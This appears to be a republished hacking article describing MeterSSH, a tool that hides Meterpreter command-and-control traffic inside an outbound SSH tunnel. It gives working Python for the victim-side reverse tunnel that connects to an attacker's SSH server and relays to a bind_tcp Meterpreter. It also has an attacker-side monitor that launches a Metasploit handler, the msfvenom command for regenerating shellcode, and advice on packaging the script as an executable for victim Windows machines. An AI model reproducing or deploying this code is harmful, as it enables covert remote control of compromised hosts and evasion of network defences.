MeterSSH - Meterpreter over SSH
MeterSSH takes shellcode, injects it into memory, and then tunnels whatever port you want over SSH, so that the command-and-control traffic is masked as a normal SSH connection.
The way it works: the deployed script injects the shellcode into memory on the victim, and the shellcode (a Meterpreter bind_tcp stager in this case) opens a listening port there. The script then connects out to the attacker's SSH server and forwards that port back through the SSH tunnel. On the attacker's side, a Meterpreter handler pointed at localhost goes through the SSH tunnel to the listener on the victim. Meterpreter traffic therefore never crosses the network in the clear; the only thing visible on the wire is an outbound SSH session from the victim to the attacker's host.
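The victim-side plumbing the paragraph above describes, as an added example that is not the MeterSSH code: a bind_tcp Meterpreter is assumed to be already listening on 127.0.0.1:8021, the script connects out to the attacker's SSH server with the article's placeholder credentials, asks sshd to listen on its own loopback port 8021 (the ssh -R remote-forward semantics), and relays every connection that arrives on that forwarded port to the local bind port. The SSH calls are paramiko's public API; `relay` and `loopback_demo` use plain sockets so the relay logic can be exercised offline without an SSH server. The host, credentials and the `loopback_demo` helper are assumptions for illustration only.

```python
import select
import socket
import threading

LOCAL_BIND_PORT = 8021      # where the bind_tcp shellcode listens on the victim
REMOTE_FORWARD_PORT = 8021  # port sshd will open on the attacker's 127.0.0.1


def relay(a, b, bufsize=4096):
    """Copy bytes both ways between two socket-like objects until either
    side closes, then close both. Returns (bytes a->b, bytes b->a).
    Works for paramiko Channels too: they have recv/sendall/fileno/close."""
    a_to_b = b_to_a = 0
    done = False
    while not done:
        readable, _, _ = select.select([a, b], [], [], 5.0)
        for src, dst in ((a, b), (b, a)):
            if src not in readable:
                continue
            data = src.recv(bufsize)
            if not data:          # peer closed: tear the pair down
                done = True
                break
            dst.sendall(data)
            if src is a:
                a_to_b += len(data)
            else:
                b_to_a += len(data)
    a.close()
    b.close()
    return a_to_b, b_to_a


def reverse_tunnel(ssh_host, ssh_port, user, password):
    """Victim side: connect out, request a remote forward, serve channels."""
    import paramiko  # only needed on the deployed machine
    client = paramiko.SSHClient()
    # Pinning the attacker's host key (client.get_host_keys().add(...)) is the
    # right thing to do; AutoAddPolicy is what most drop-in tools use instead.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ssh_host, port=ssh_port, username=user, password=password,
                   allow_agent=False, look_for_keys=False)
    transport = client.get_transport()
    # Equivalent of: ssh -R 127.0.0.1:8021:127.0.0.1:8021 user@ssh_host
    # With no handler given, forwarded connections are returned by accept().
    transport.request_port_forward("127.0.0.1", REMOTE_FORWARD_PORT)
    while transport.is_active():
        chan = transport.accept(timeout=30)
        if chan is None:
            continue
        # Each accepted channel is one handler connection from the attacker;
        # hand it to the Meterpreter bind port on this machine.
        local = socket.create_connection(("127.0.0.1", LOCAL_BIND_PORT))
        threading.Thread(target=relay, args=(chan, local), daemon=True).start()


def loopback_demo():
    """Exercise relay() with two socketpairs standing in for the SSH channel
    and the local bind port (constructed data, no network involved)."""
    chan_peer, chan = socket.socketpair()
    bind_port, bind_peer = socket.socketpair()
    result = {}
    t = threading.Thread(
        target=lambda: result.setdefault("n", relay(chan, bind_port)), daemon=True)
    t.start()
    chan_peer.sendall(b"hello")     # "handler" -> victim bind port
    got_in = bind_peer.recv(1024)
    bind_peer.sendall(b"world!")    # victim -> "handler"
    got_out = chan_peer.recv(1024)
    chan_peer.close()               # handler hangs up, relay tears both ends down
    t.join(10)
    bind_peer.close()
    return got_in, got_out, result.get("n")


if __name__ == "__main__":
    # Placeholders from the article's config block; replace with your own.
    reverse_tunnel("192.168.1.1", 22, "sshuser", "sshpw")
```

Because the forward is requested on the server's 127.0.0.1, only processes on the attacker's box can reach the tunnel entrance; sshd's default GatewayPorts setting keeps it that way.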
Features:
- Meterpreter over SSH
- Ability to configure different IPs, ports, etc. without ever needing to change the shellcode.
- Monitors for the SSH connection and automatically launches the Metasploit handler to grab the shell
Usage:
There are two files, monitor.py and meterssh.py.
monitor.py - run this on the attacker's machine to wait for the SSH connection. It polls port 8021 on localhost until the SSH tunnel has opened it, then spawns Metasploit for you automatically to grab the shell.
meterssh.py - this is what you deploy to the victim machine. Note that most Windows machines won't have Python installed, so it's recommended to compile it into an executable with py2exe or PyInstaller.
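What monitor.py is described as doing, as an added example that is not the project's code: wait on the attacker's machine until sshd has opened the forwarded port on loopback, then write a resource script and start a Metasploit handler against it. One design point matters here: testing the port by connecting to it is not a harmless probe, because sshd relays that connection down the tunnel and the victim side hands it to the Meterpreter bind port, so this version reads /proc/net/tcp (Linux) for a LISTEN socket instead. The resource-script commands are standard msfconsole syntax for a bind_tcp handler; the sample /proc/net/tcp lines are constructed, and the rc file path is an assumption.

```python
import os
import subprocess
import time

TUNNEL_PORT = 8021  # forwarded port the article uses


def parse_listeners(proc_net_tcp_text):
    """Return {(ip, port)} for every IPv4 socket in LISTEN state (st == 0A)
    in /proc/net/tcp text. Addresses are little-endian hex, ports big-endian
    hex. (/proc/net/tcp6 needs the same treatment for IPv6 listeners.)"""
    listeners = set()
    for line in proc_net_tcp_text.splitlines()[1:]:   # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != "0A":
            continue
        addr_hex, port_hex = fields[1].split(":")
        octets = [int(addr_hex[i:i + 2], 16) for i in (6, 4, 2, 0)]
        listeners.add((".".join(map(str, octets)), int(port_hex, 16)))
    return listeners


def listening_on_loopback(port, proc_net_tcp_text):
    """True if something is listening on 127.0.0.1:port in the given text."""
    return ("127.0.0.1", port) in parse_listeners(proc_net_tcp_text)


def tunnel_is_up(port=TUNNEL_PORT, proc_path="/proc/net/tcp"):
    """True once sshd has bound the remote forward on our loopback."""
    with open(proc_path) as f:
        return listening_on_loopback(port, f.read())


def handler_rc(port=TUNNEL_PORT):
    """Resource script for a bind_tcp handler aimed at the local end of the
    tunnel; sshd carries the connection to the victim's Meterpreter."""
    return "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD windows/meterpreter/bind_tcp",
        "set RHOST 127.0.0.1",
        f"set LPORT {port}",
        "exploit",
    ]) + "\n"


def wait_and_launch(port=TUNNEL_PORT, rc_path="/tmp/meterssh_handler.rc",
                    interval=2.0):
    """Block until the forwarded port appears, then hand off to msfconsole."""
    while not tunnel_is_up(port):
        time.sleep(interval)
    with open(rc_path, "w") as f:
        f.write(handler_rc(port))
    os.chmod(rc_path, 0o600)
    subprocess.call(["msfconsole", "-q", "-r", rc_path])


# Constructed /proc/net/tcp excerpt: sshd listening on 22 (all interfaces),
# the forwarded port 8021 listening on loopback, and one established
# connection on that port (which is not a listener).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F55 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 23456 1 0000000000000000 100 0 0 10 0
   2: 0100007F:1F55 0100007F:9C40 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    wait_and_launch()
```

The 0x1F55 in the sample is 8021 in hex; the parser turns the kernel's byte-swapped 0100007F back into 127.0.0.1 so the check reads naturally.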
Fields you need to edit inside meterssh.py:
# username for SSH
user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attacker's SSH server
port = "22"
- user - the user account on the attacker's SSH server (do not use root; root is not needed)
- password - the password for that account
- rhost - the attacker's SSH server IP address
- port - the attacker's SSH server port
Keep in mind that these credentials are embedded in plain text in whatever you deploy, so anyone who recovers the script or executable from the victim can read them. Use a dedicated account with no interactive shell and nothing else reachable through it.
You don't need to change the Metasploit shellcode: it is an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want a different port, swap in shellcode generated for the new port (msfvenom -p windows/meterpreter/bind_tcp LPORT=<port>) and change 8021 inside the script to match, since the tunnel and the handler on the attacker's side both key off that number. You do not need to do this unless you want to customize or modify the setup.
from Effect Hacking